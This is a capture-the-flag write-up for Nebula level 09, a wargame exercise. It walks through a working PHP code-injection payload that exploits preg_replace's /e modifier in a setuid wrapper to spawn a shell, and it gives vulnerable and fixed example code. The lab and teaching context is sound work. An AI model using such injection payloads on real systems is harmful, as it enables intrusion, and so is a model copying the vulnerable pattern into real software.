Expansion of variables
Nebula 09 Agenda: “There’s a C setuid wrapper for some vulnerable PHP code…”

In PHP, variables inside a double-quoted string are interpolated. Furthermore, the complex (curly brace) syntax, which allows more elaborate expressions, can even expand a function call: “{$use_me(sh)}” calls whatever function name is stored in $use_me, passing the bare word sh (an undefined constant, which older PHP silently treats as the string 'sh') as its argument.
The script’s usage shows that it takes two arguments ($argv[1] and $argv[2]), which are passed into the “markup” function. “$filename” names the file read by file_get_contents. The second one, “$use_me” (the name says it all), is never used inside markup, so let’s put it to use: the file contents we control end up interpolated, and $use_me supplies the function name.
level09@nebula:~$ cat > /tmp/mail
[email {$use_me(sh)}]
level09@nebula:~$ /home/flag09/flag09 /tmp/mail system
PHP Notice: Use of undefined constant sh - assumed 'sh' in /home/flag09/flag09.php(15) : regexp code on line 1
sh-4.2$ getflag
You have successfully executed getflag on a target account
A few more words to shed some light on the level source. The preg_replace call uses the PREG_REPLACE_EVAL (“e”) pattern modifier, so the replacement string spam("\2") is not inserted literally but evaluated as PHP code, with the backreference to the second captured subpattern “(.*)” substituted in first. Our file contents therefore land inside a double-quoted PHP string literal, and that is where the trick happens: when the eval’d replacement spam("{$use_me(sh)}") is compiled, the complex variable syntax is interpolated, $use_me (“system”, our second argument, which is in scope because the eval runs inside markup) is called with 'sh', and the shell is spawned before anything reaches print. That’s it!
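To make the mechanism concrete, here is an added example (my own code, not the level’s flag09.php, though the vulnerable function mirrors the preg_replace pattern described above) showing the “e” modifier path next to the fix with preg_replace_callback. The functions markup_vulnerable and markup_safe, and the sample input, are constructed for this illustration. The “e” modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so the vulnerable branch only executes on PHP 5.x; the hardened version runs on any PHP.

```php
<?php
// Added example, not the level's own source. Reproduces the /e-modifier bug
// described in the write-up and shows the hardened replacement.

function spam($email)
{
    // Same transformation the level applies to captured e-mail addresses.
    $email = preg_replace("/\./", " dot ", $email);
    $email = preg_replace("/@/", " AT ", $email);
    return $email;
}

// Vulnerable (PHP 5.x only): with the "e" modifier the replacement string is
// evaluated as PHP code. Backreference \2 is pasted into a double-quoted
// literal, so input containing "{$use_me(sh)}" is interpolated as a call to
// whatever function name $use_me holds; $use_me is in scope because the eval
// runs inside this function.
function markup_vulnerable($contents, $use_me)
{
    return preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);
}

// Hardened: preg_replace_callback hands the captured text to the callback as
// data. No string literal is built from user input, so no interpolation and
// no evaluation can happen.
function markup_safe($contents)
{
    return preg_replace_callback(
        "/\[email (.*?)\]/",
        function ($m) {
            return spam($m[1]);
        },
        $contents
    );
}

// Constructed input, identical to the /tmp/mail file from the level.
// Single quotes keep the braces and $ literal here.
$input = '[email {$use_me(sh)}]' . "\n";

if (version_compare(PHP_VERSION, '7.0.0', '<')) {
    // Harmless demonstration: $use_me = "strtoupper" turns the captured text
    // into "SH", proving the function call was interpolated and executed.
    // With $use_me = "system" this is exactly the level's shell spawn.
    echo markup_vulnerable($input, 'strtoupper');   // [email SH]
}

// The fixed version treats the payload as plain text.
echo markup_safe($input);                           // [email {$use_me(sh)}]
```

On PHP 5.x the vulnerable call emits the same “Use of undefined constant sh” notice seen in the session above, because the bare word sh inside the interpolated call is still parsed as a constant. The hardened call never evaluates anything: the braces survive untouched in the output, which is the quickest check that a preg_replace_callback migration has actually closed the hole.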